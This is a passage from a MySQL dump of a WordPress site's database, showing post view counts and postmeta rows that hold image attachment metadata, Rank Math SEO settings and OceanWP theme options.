tal',1221),(5356,4,'total',1222),(3107,4,'total',1224),(5146,4,'total',1227),(5489,4,'total',1227),(3092,4,'total',1228),(3249,4,'total',1228),(5153,4,'total',1229),(5492,4,'total',1232),(5412,4,'total',1238),(5264,4,'total',1239),(5067,4,'total',1243),(5122,4,'total',1243),(5353,4,'total',1245),(4432,4,'total',1247),(2293,4,'total',1248),(4363,4,'total',1248),(5137,4,'total',1248),(4424,4,'total',1250),(4976,4,'total',1253),(5425,4,'total',1256),(3257,4,'total',1259),(3287,4,'total',1260),(5461,4,'total',1260),(4514,4,'total',1261),(4765,4,'total',1262),(5101,4,'total',1262),(4377,4,'total',1266),(4368,4,'total',1269),(3738,4,'total',1274),(3273,4,'total',1278),(4396,4,'total',1279),(4771,4,'total',1283),(4712,4,'total',1284),(3265,4,'total',1285),(4275,4,'total',1289),(4654,4,'total',1290),(4444,4,'total',1296),(5512,4,'total',1296),(3297,4,'total',1297),(4651,4,'total',1300),(4703,4,'total',1304),(4657,4,'total',1308),(4329,4,'total',1309),(4400,4,'total',1310),(4996,4,'total',1312),(5125,4,'total',1313),(3275,4,'total',1316),(4750,4,'total',1317),(5464,4,'total',1317),(5334,4,'total',1319),(2156,4,'total',1321),(4697,4,'total',1322),(5561,4,'total',1325),(3229,4,'total',1328),(4753,4,'total',1331),(5449,4,'total',1332),(3278,4,'total',1335),(3735,4,'total',1342),(4608,4,'total',1345),(4706,4,'total',1352),(4983,4,'total',1354),(3721,4,'total',1355),(3240,4,'total',1356),(3731,4,'total',1356),(5157,4,'total',1356),(5433,4,'total',1357),(2252,4,'total',1358),(4694,4,'total',1358),(3267,4,'total',1360),(4332,4,'total',1361),(4517,4,'total',1361),(5128,4,'total',1366),(4238,4,'total',1367),(5307,4,'total',1367),(4566,4,'total',1382),(3243,4,'total',1395),(5570,4,'total',1396),(3271,4,'total',1397),(5400,4,'total',1397),(3263,4,'total',1398),(5605,4,'total',1402),(1720,4,'total',1410),(5598,4,'total',1414),(3282,4,'total',1416),(1732,4,'total',1419),(3316,4,'total',1424),(4709,4,'total',1428),(3245,4,'total',1429),(3771,4,'total',1429),(5071,4,'total',1429),(4542,4,'total',1434),(1751,4,'total',1435),(2993,4,'total',1436),(3259,4,'total',1442),(2296,4,'total',1443),(2248,4,'total',1445),(4700,4,'total',1446),(5033,4,'total',1446),(1709,4,'total',1450),(3090,4,'total',1452),(3774,4,'total',1453),(4759,4,'total',1454),(5131,4,'total',1455),(4341,4,'total',1456),(5280,4,'total',1458),(1739,4,'total',1459),(1713,4,'total',1469),(3724,4,'total',1469),(2063,4,'total',1473),(1782,4,'total',1479),(5593,4,'total',1490),(1707,4,'total',1492),(1705,4,'total',1495),(4436,4,'total',1497),(4448,4,'total',1498),(3430,4,'total',1500),(4323,4,'total',1500),(5409,4,'total',1500),(1768,4,'total',1503),(3261,4,'total',1507),(3752,4,'total',1512),(4416,4,'total',1515),(2748,4,'total',1520),(1772,4,'total',1522),(4326,4,'total',1525),(1715,4,'total',1530),(4677,4,'total',1531),(4582,4,'total',1535),(3777,4,'total',1541),(5062,4,'total',1548),(1747,4,'total',1549),(2150,4,'total',1550),(4454,4,'total',1553),(4612,4,'total',1554),(3438,4,'total',1555),(3749,4,'total',1556),(4556,4,'total',1556),(4660,4,'total',1558),(4722,4,'total',1561),(5259,4,'total',1562),(2161,4,'total',1564),(1737,4,'total',1571),(3124,4,'total',1574),(5428,4,'total',1575),(1699,4,'total',1583),(4551,4,'total',1587),(5454,4,'total',1592),(5441,4,'total',1601),(5276,4,'total',1602),(2965,4,'total',1614),(3486,4,'total',1615),(4301,4,'total',1615),(1776,4,'total',1618),(1701,4,'total',1619),(482,4,'total',1621),(3253,4,'total',1621),(1726,4,'total',1623),(3079,4,'total',1623),(3226,4,'total',1623),(3482,4,'total',1623),(1743,4,'total',1629),(2964,4,'total',1631),(483,4,'total',1633),(2152,4,'total',1635),(3307,4,'total',1637),(3742,4,'total',1640),(4524,4,'total',1646),(3290,4,'total',1648),(4338,4,'total',1651),(3479,4,'total',1659),(1745,4,'total',1660),(5436,4,'total',1667),(1749,4,'total',1669),(1730,4,'total',1676),(479,4,'total',1685),(3251,4,'total',1688),(1711,4,'total',1689),(3285,4,'total',1695),(480,4,'total',1702),(3041,4,'total',1702),(478,4,'total',1703),(2154,4,'total',1708),(3034,4,'total',1722),(3531,4,'total',1734),(481,4,'total',1737),(1590,4,'total',1738),(2178,4,'total',1738),(3063,4,'total',1747),(2165,4,'total',1762),(3072,4,'total',1762),(1703,4,'total',1765),(2558,4,'total',1775),(488,4,'total',1776),(485,4,'total',1794),(4645,4,'total',1794),(476,4,'total',1809),(4529,4,'total',1812),(484,4,'total',1818),(4335,4,'total',1822),(3027,4,'total',1848),(3498,4,'total',1848),(1770,4,'total',1849),(3006,4,'total',1852),(3489,4,'total',1862),(4412,4,'total',1866),(3313,4,'total',1870),(3710,4,'total',1872),(3534,4,'total',1875),(2989,4,'total',1894),(3087,4,'total',1903),(4420,4,'total',1914),(486,4,'total',1921),(3038,4,'total',1921),(477,4,'total',1940),(2956,4,'total',1946),(1780,4,'total',1957),(3117,4,'total',1957),(2297,4,'total',1961),(3127,4,'total',1961),(5397,4,'total',1963),(3102,4,'total',1969),(2617,4,'total',1970),(1774,4,'total',1974),(3004,4,'total',1997),(471,4,'total',2005),(2911,4,'total',2013),(5420,4,'total',2023),(3045,4,'total',2046),(1722,4,'total',2048),(3023,4,'total',2060),(5076,4,'total',2069),(3066,4,'total',2070),(1592,4,'total',2084),(2751,4,'total',2096),(2801,4,'total',2161),(1584,4,'total',2175),(2148,4,'total',2196),(3005,4,'total',2196),(1778,4,'total',2220),(5163,4,'total',2233),(1724,4,'total',2245),(5406,4,'total',2273),(1728,4,'total',2294),(3247,4,'total',2295),(472,4,'total',2312),(1766,4,'total',2322),(2658,4,'total',2326),(1718,4,'total',2337),(4520,4,'total',2346),(2775,4,'total',2360),(5502,4,'total',2393),(3541,4,'total',2399),(2804,4,'total',2423),(2159,4,'total',2470),(3069,4,'total',2471),(570,4,'total',2566),(2609,4,'total',2570),(4457,4,'total',2571),(1606,4,'total',2590),(469,4,'total',2601),(2809,4,'total',2645),(1741,4,'total',2709),(1610,4,'total',2750),(2704,4,'total',2761),(4930,4,'total',2774),(3083,4,'total',2792),(2769,4,'total',2851),(487,4,'total',2857),(2813,4,'total',2862),(1604,4,'total',2916),(2457,4,'total',2933),(467,4,'total',2939),(1596,4,'total',2949),(473,4,'total',3073),(1614,4,'total',3197),(3030,4,'total',3267),(1612,4,'total',3271),(74,4,'total',3343),(468,4,'total',3351),(1608,4,'total',3406),(474,4,'total',3489),(1598,4,'total',3578),(1588,4,'total',3627),(108,4,'total',3967),(1544,4,'total',4023),(3764,4,'total',4032),(470,4,'total',4037),(335,4,'total',4125),(84,4,'total',4224),(1594,4,'total',4250),(2309,4,'total',4376),(87,4,'total',4549),(1600,4,'total',4736),(2503,4,'total',4831),(1602,4,'total',5051),(76,4,'total',5653),(3781,4,'total',5848),(1582,4,'total',5960),(91,4,'total',6278),(1586,4,'total',6396),(3060,4,'total',7428),(89,4,'total',8363),(2904,4,'total',9701),(68,4,'total',9942),(72,4,'total',10230),(80,4,'total',53141),(9,4,'total',1394387);
/*!40000 ALTER TABLE `wp_post_views` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_postmeta`
--

DROP TABLE IF EXISTS `wp_postmeta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_postmeta` (
  `meta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `post_id` bigint(20) unsigned NOT NULL DEFAULT '0',
  `meta_key` varchar(255) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `meta_value` longtext COLLATE utf8mb4_unicode_ci,
  PRIMARY KEY (`meta_id`),
  KEY `post_id` (`post_id`),
  KEY `meta_key` (`meta_key`(191))
) ENGINE=MyISAM AUTO_INCREMENT=39777 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_postmeta`
--

LOCK TABLES `wp_postmeta` WRITE;
/*!40000 ALTER TABLE `wp_postmeta` DISABLE KEYS */;
INSERT INTO `wp_postmeta` VALUES (23,14,'_wp_attached_file','2019/11/slide_ccd.jpg'),(24,14,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1100;s:6:\"height\";i:507;s:4:\"file\";s:21:\"2019/11/slide_ccd.jpg\";s:5:\"sizes\";a:12:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"slide_ccd-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"slide_ccd-300x138.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:138;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"slide_ccd-768x354.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:354;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"slide_ccd-1024x472.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:472;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:21:\"slide_ccd-370x265.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:20:\"slide_ccd-150x85.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:21:\"slide_ccd-230x230.jpg\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:21:\"slide_ccd-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"kava-thumb-m-vertical\";a:4:{s:4:\"file\";s:21:\"slide_ccd-370x500.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"kava-thumb-m-2\";a:4:{s:4:\"file\";s:21:\"slide_ccd-570x450.jpg\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"kava-thumb-masonry\";a:4:{s:4:\"file\";s:21:\"slide_ccd-600x277.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:277;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"kava-thumb-justify\";a:4:{s:4:\"file\";s:21:\"slide_ccd-640x507.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:507;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:2:\"16\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:9:\"ILCE-3000\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1473259054\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"18\";s:3:\"iso\";s:3:\"100\";s:13:\"shutter_speed\";s:4:\"0.01\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(27,16,'_wp_attached_file','2019/11/ekms.png'),(28,16,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:256;s:6:\"height\";i:256;s:4:\"file\";s:16:\"2019/11/ekms.png\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:16:\"ekms-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:15:\"ekms-150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:16:\"ekms-230x230.png\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(29,17,'_wp_attached_file','2019/11/cropped-ekms.png'),(30,17,'_wp_attachment_context','site-icon'),(31,17,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:512;s:6:\"height\";i:512;s:4:\"file\";s:24:\"2019/11/cropped-ekms.png\";s:5:\"sizes\";a:12:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"cropped-ekms-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"cropped-ekms-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:24:\"cropped-ekms-370x265.png\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:23:\"cropped-ekms-150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:24:\"cropped-ekms-230x230.png\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:24:\"cropped-ekms-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"kava-thumb-m-vertical\";a:4:{s:4:\"file\";s:24:\"cropped-ekms-370x500.png\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-m-2\";a:4:{s:4:\"file\";s:24:\"cropped-ekms-512x450.png\";s:5:\"width\";i:512;s:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/png\";}s:13:\"site_icon-270\";a:4:{s:4:\"file\";s:24:\"cropped-ekms-270x270.png\";s:5:\"width\";i:270;s:6:\"height\";i:270;s:9:\"mime-type\";s:9:\"image/png\";}s:13:\"site_icon-192\";a:4:{s:4:\"file\";s:24:\"cropped-ekms-192x192.png\";s:5:\"width\";i:192;s:6:\"height\";i:192;s:9:\"mime-type\";s:9:\"image/png\";}s:13:\"site_icon-180\";a:4:{s:4:\"file\";s:24:\"cropped-ekms-180x180.png\";s:5:\"width\";i:180;s:6:\"height\";i:180;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"site_icon-32\";a:4:{s:4:\"file\";s:22:\"cropped-ekms-32x32.png\";s:5:\"width\";i:32;s:6:\"height\";i:32;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(39,20,'_wp_attached_file','2019/11/Logo-e1573190685865.png'),(40,20,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:180;s:6:\"height\";i:98;s:4:\"file\";s:31:\"2019/11/Logo-e1573190685865.png\";s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(48,20,'_wp_attachment_backup_sizes','a:5:{s:9:\"full-orig\";a:3:{s:5:\"width\";i:625;s:6:\"height\";i:340;s:4:\"file\";s:8:\"Logo.png\";}s:18:\"full-1573190469565\";a:3:{s:5:\"width\";i:200;s:6:\"height\";i:109;s:4:\"file\";s:23:\"Logo-e1573190439851.png\";}s:18:\"full-1573190481683\";a:3:{s:5:\"width\";i:100;s:6:\"height\";i:54;s:4:\"file\";s:23:\"Logo-e1573190469565.png\";}s:18:\"full-1573190503186\";a:3:{s:5:\"width\";i:100;s:6:\"height\";i:54;s:4:\"file\";s:23:\"Logo-e1573190481683.png\";}s:18:\"full-1573190685865\";a:3:{s:5:\"width\";i:225;s:6:\"height\";i:122;s:4:\"file\";s:23:\"Logo-e1573190516592.png\";}}'),(229,59,'_wp_attached_file','2019/11/liberia_flag.png'),(230,59,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:40;s:6:\"height\";i:27;s:4:\"file\";s:24:\"2019/11/liberia_flag.png\";s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(260,68,'_edit_lock','1662117044:42'),(262,68,'_edit_last','38'),(263,68,'rank_math_internal_links_processed','1'),(264,68,'rank_math_seo_score','23'),(265,68,'rank_math_robots','a:1:{i:0;s:5:\"index\";}'),(266,68,'rank_math_advanced_robots','a:3:{s:11:\"max-snippet\";s:2:\"-1\";s:17:\"max-video-preview\";s:2:\"-1\";s:17:\"max-image-preview\";s:5:\"large\";}'),(267,68,'rank_math_rich_snippet','article'),(268,68,'rank_math_snippet_shortcode','[rank_math_rich_snippet]'),(269,68,'rank_math_snippet_article_type','Article'),(270,68,'rank_math_snippet_book_editions','a:1:{i:0;a:1:{s:11:\"book_format\";s:9:\"Hardcover\";}}'),(271,68,'rank_math_snippet_course_provider_type','Organization'),(272,68,'rank_math_snippet_event_type','Event'),(273,68,'rank_math_snippet_event_performer_type','Person'),(274,68,'rank_math_snippet_jobposting_unpublish','on'),(275,68,'rank_math_snippet_music_type','MusicGroup'),(276,68,'rank_math_snippet_product_instock','on'),(277,68,'rank_math_snippet_recipe_instruction_type','SingleField'),(278,68,'rank_math_snippet_review_worst_rating','1'),(279,68,'rank_math_snippet_review_best_rating','5'),(280,68,'rank_math_snippet_review_location','bottom'),(281,68,'rank_math_snippet_review_shortcode','[rank_math_review_snippet]'),(282,68,'rank_math_facebook_enable_image_overlay','off'),(283,68,'rank_math_facebook_image_overlay','play'),(284,68,'rank_math_twitter_use_facebook','on'),(285,68,'rank_math_twitter_card_type','summary_large_image'),(286,68,'rank_math_twitter_enable_image_overlay','off'),(287,68,'rank_math_twitter_image_overlay','play'),(288,68,'ocean_sidebar','0'),(289,68,'ocean_second_sidebar','0'),(290,68,'ocean_disable_margins','enable'),(291,68,'ocean_display_top_bar','default'),(292,68,'ocean_display_header','default'),(293,68,'ocean_center_header_left_menu','0'),(294,68,'ocean_custom_header_template','0'),(295,68,'ocean_header_custom_menu','0'),(296,68,'ocean_menu_typo_font_family','0'),(297,68,'ocean_disable_title','default'),(298,68,'ocean_disable_heading','default'),(299,68,'ocean_disable_breadcrumbs','default'),(300,68,'ocean_display_footer_widgets','default'),(301,68,'ocean_display_footer_bottom','default'),(302,68,'ocean_custom_footer_template','0'),(346,72,'_edit_lock','1774341967:38'),(348,72,'_edit_last','1'),(349,72,'rank_math_internal_links_processed','1'),(350,72,'rank_math_seo_score','0'),(351,72,'rank_math_robots','a:1:{i:0;s:5:\"index\";}'),(352,72,'rank_math_advanced_robots','a:3:{s:11:\"max-snippet\";s:2:\"-1\";s:17:\"max-video-preview\";s:2:\"-1\";s:17:\"max-image-preview\";s:5:\"large\";}'),(353,72,'rank_math_rich_snippet','article'),(354,72,'rank_math_snippet_shortcode','[rank_math_rich_snippet]'),(355,72,'rank_math_snippet_article_type','Article'),(356,72,'rank_math_snippet_book_editions','a:1:{i:0;a:1:{s:11:\"book_format\";s:9:\"Hardcover\";}}'),(357,72,'rank_math_snippet_course_provider_type','Organization'),(358,72,'rank_math_snippet_event_type','Event'),(359,72,'rank_math_snippet_event_performer_type','Person'),(360,72,'rank_math_snippet_jobposting_unpublish','on'),(361,72,'rank_math_snippet_music_type','MusicGroup'),(362,72,'rank_math_snippet_product_instock','on'),(363,72,'rank_math_snippet_recipe_instruction_type','SingleField'),(364,72,'rank_math_snippet_review_worst_rating','1'),(365,72,'rank_math_snippet_review_best_rating','5'),(366,72,'rank_math_snippet_review_location','bottom'),(367,72,'rank_math_snippet_review_shortcode','[rank_math_review_snippet]'),(368,72,'rank_math_facebook_enable_image_overlay','off'),(369,72,'rank_math_facebook_image_overlay','play'),(370,72,'rank_math_twitter_use_facebook','on'),(371,72,'rank_math_twitter_card_type','summary_large_image'),(372,72,'rank_math_twitter_enable_image_overlay','off'),(373,72,'rank_math_twitter_image_overlay','play'),(374,72,'ocean_sidebar','0'),(375,72,'ocean_second_sidebar','0'),(376,72,'ocean_disable_margins','enable'),(377,72,'ocean_display_top_bar','default'),(378,72,'ocean_display_header','default'),(379,72,'ocean_center_header_left_menu','0'),(380,72,'ocean_custom_header_template','0'),(381,72,'ocean_header_custom_menu','0'),(382,72,'ocean_menu_typo_font_family','0'),(383,72,'ocean_disable_title','default'),(384,72,'ocean_disable_heading','default'),(385,72,'ocean_disable_breadcrumbs','default'),(386,72,'ocean_display_footer_widgets','default'),(387,72,'ocean_display_footer_bottom','default'),(388,72,'ocean_custom_footer_template','0'),(389,74,'_edit_lock','1629384560:43'),(391,74,'_edit_last','5'),(392,74,'rank_math_internal_links_processed','1'),(393,74,'rank_math_seo_score','0'),(394,74,'rank_math_robots','a:1:{i:0;s:5:\"index\";}'),(395,74,'rank_math_advanced_robots','a:3:{s:11:\"max-snippet\";s:2:\"-1\";s:17:\"max-video-preview\";s:2:\"-1\";s:17:\"max-image-preview\";s:5:\"large\";}'),(396,74,'rank_math_rich_snippet','article'),(397,74,'rank_math_snippet_shortcode','[rank_math_rich_snippet]'),(398,74,'rank_math_snippet_article_type','Article'),(399,74,'rank_math_snippet_book_editions','a:1:{i:0;a:1:{s:11:\"book_format\";s:9:\"Hardcover\";}}'),(400,74,'rank_math_snippet_course_provider_type','Organization'),(401,74,'rank_math_snippet_event_type','Event'),(402,74,'rank_math_snippet_event_performer_type','Person'),(403,74,'rank_math_snippet_jobposting_unpublish','on'),(404,74,'rank_math_snippet_music_type','MusicGroup'),(405,74,'rank_math_snippet_product_instock','on'),(406,74,'rank_math_snippet_recipe_instruction_type','SingleField'),(407,74,'rank_math_snippet_review_worst_rating','1'),(408,74,'rank_math_snippet_review_best_rating','5'),(409,74,'rank_math_snippet_review_location','bottom'),(410,74,'rank_math_snippet_review_shortcode','[rank_math_review_snippet]'),(411,74,'rank_math_facebook_enable_image_overlay','off'),(412,74,'rank_math_facebook_image_overlay','play'),(413,74,'rank_math_twitter_use_facebook','on'),(414,74,'rank_math_twitter_card_type','summary_large_image'),(415,74,'rank_math_twitter_enable_image_overlay','off'),(416,74,'rank_math_twitter_image_overlay','play'),(417,74,'ocean_sidebar','0'),(418,74,'ocean_second_sidebar','0'),(419,74,'ocean_disable_margins','enable'),(420,74,'ocean_display_top_bar','default'),(421,74,'ocean_display_header','default'),(422,74,'ocean_center_header_left_menu','0'),(423,74,'ocean_custom_header_template','0'),(424,74,'ocean_header_custom_menu','0'),(425,74,'ocean_menu_typo_font_family','0'),(426,74,'ocean_disable_title','default'),(427,74,'ocean_disable_heading','default'),(428,74,'ocean_disable_breadcrumbs','default'),(429,74,'ocean_display_footer_widgets','default'),(430,74,'ocean_display_footer_bottom','default'),(431,74,'ocean_custom_footer_template','0'),(432,76,'_edit_lock','1629198824:38'),(434,76,'_edit_last','1'),(435,76,'rank_math_internal_links_processed','1'),(436,76,'rank_math_seo_score','11'),(437,76,'rank_math_robots','a:1:{i:0;s:5:\"index\";}'),(438,76,'rank_math_advanced_robots','a:3:{s:11:\"max-snippet\";s:2:\"-1\";s:17:\"max-video-preview\";s:2:\"-1\";s:17:\"max-image-preview\";s:5:\"large\";}'),(439,76,'rank_math_rich_snippet','article'),(440,76,'rank_math_snippet_shortcode','[rank_math_rich_snippet]'),(441,76,'rank_math_snippet_article_type','Article'),(442,76,'rank_math_snippet_book_editions','a:1:{i:0;a:1:{s:11:\"book_format\";s:9:\"Hardcover\";}}'),(443,76,'rank_math_snippet_course_provider_type','Organization'),(444,76,'rank_math_snippet_event_type','Event'),(445,76,'rank_math_snippet_event_performer_type','Person'),(446,76,'rank_math_snippet_jobposting_unpublish','on'),(447,76,'rank_math_snippet_music_type','MusicGroup'),(448,76,'rank_math_snippet_product_instock','on'),(449,76,'rank_math_snippet_recipe_instruction_type','SingleField'),(450,76,'rank_math_snippet_review_worst_rating','1'),(451,76,'rank_math_snippet_review_best_rating','5'),(452,76,'rank_math_snippet_review_location','bottom'),(453,76,'rank_math_snippet_review_shortcode','[rank_math_review_snippet]'),(454,76,'rank_math_facebook_enable_image_overlay','off'),(455,76,'rank_math_facebook_image_overlay','play'),(456,76,'rank_math_twitter_use_facebook','on'),(457,76,'rank_math_twitter_card_type','summary_large_image'),(458,76,'rank_math_twitter_enable_image_overlay','off'),(459,76,'rank_math_twitter_image_overlay','play'),(460,76,'ocean_sidebar','0'),(461,76,'ocean_second_sidebar','0'),(462,76,'ocean_disable_margins','enable'),(463,76,'ocean_display_top_bar','default'),(464,76,'ocean_display_header','default'),(465,76,'ocean_center_header_left_menu','0'),(466,76,'ocean_custom_header_template','0'),(467,76,'ocean_header_custom_menu','0'),(468,76,'ocean_menu_typo_font_family','0'),(469,76,'ocean_disable_title','default'),(470,76,'ocean_disable_heading','default'),(471,76,'ocean_disable_breadcrumbs','default'),(472,76,'ocean_display_footer_widgets','default'),(473,76,'ocean_display_footer_bottom','default'),(474,76,'ocean_custom_footer_template','0'),(518,80,'_edit_lock','1663671894:42'),(520,80,'_edit_last','1'),(521,80,'rank_math_internal_links_processed','1'),(522,80,'rank_math_seo_score','0'),(523,80,'rank_math_robots','a:1:{i:0;s:5:\"index\";}'),(524,80,'rank_math_advanced_robots','a:3:{s:11:\"max-snippet\";s:2:\"-1\";s:17:\"max-video-preview\";s:2:\"-1\";s:17:\"max-image-preview\";s:5:\"large\";}'),(525,80,'rank_math_rich_snippet','article'),(526,80,'rank_math_snippet_shortcode','[rank_math_rich_snippet]'),(527,80,'rank_math_snippet_article_type','Article'),(528,80,'rank_math_snippet_book_editions','a:1:{i:0;a:1:{s:11:\"book_format\";s:9:\"Hardcover\";}}'),(529,80,'rank_math_snippet_course_provider_type','Organization'),(530,80,'rank_math_snippet_event_type','Event'),(531,80,'rank_math_snippet_event_performer_type','Person'),(532,80,'rank_math_snippet_jobposting_unpublish','on'),(533,80,'rank_math_snippet_music_type','MusicGroup'),(534,80,'rank_math_snippet_product_instock','on'),(535,80,'rank_math_snippet_recipe_instruction_type','SingleField'),(536,80,'rank_math_snippet_review_worst_rating','1'),(537,80,'rank_math_snippet_review_best_rating','5'),(538,80,'rank_math_snippet_review_location','bottom'),(539,80,'rank_math_snippet_review_shortcode','[rank_math_review_snippet]'),(540,80,'rank_math_facebook_enable_image_overlay','off'),(541,80,'rank_math_facebook_image_overlay','play'),(542,80,'rank_math_twitter_use_facebook','on'),(543,80,'rank_math_twitter_card_type','summary_large_image'),(544,80,'rank_math_twitter_enable_image_overlay','off'),(545,80,'rank_math_twitter_image_overlay','play'),(547,80,'ocean_second_sidebar','0'),(548,80,'ocean_disable_margins','enable'),(549,80,'ocean_display_top_bar','default'),(550,80,'ocean_display_header','default'),(551,80,'ocean_center_header_left_menu','0'),(552,80,'ocean_custom_header_template','0'),(553,80,'ocean_header_custom_menu','0'),(554,80,'ocean_menu_typo_font_family','0'),(555,80,'ocean_disable_title','default'),(556,80,'ocean_disable_heading','default'),(557,80,'ocean_disable_breadcrumbs','default'),(558,80,'ocean_display_footer_widgets','default'),(559,80,'ocean_display_footer_bottom','default'),(560,80,'ocean_custom_footer_template','0'),(561,82,'_edit_lock','1574849730:1'),(562,82,'_elementor_controls_usage','a:0:{}'),(563,82,'_edit_last','1'),(564,82,'rank_math_internal_links_processed','1'),(565,82,'rank_math_seo_score','1'),(566,82,'rank_math_robots','a:1:{i:0;s:5:\"index\";}'),(567,82,'rank_math_advanced_robots','a:3:{s:11:\"max-snippet\";s:2:\"-1\";s:17:\"max-video-preview\";s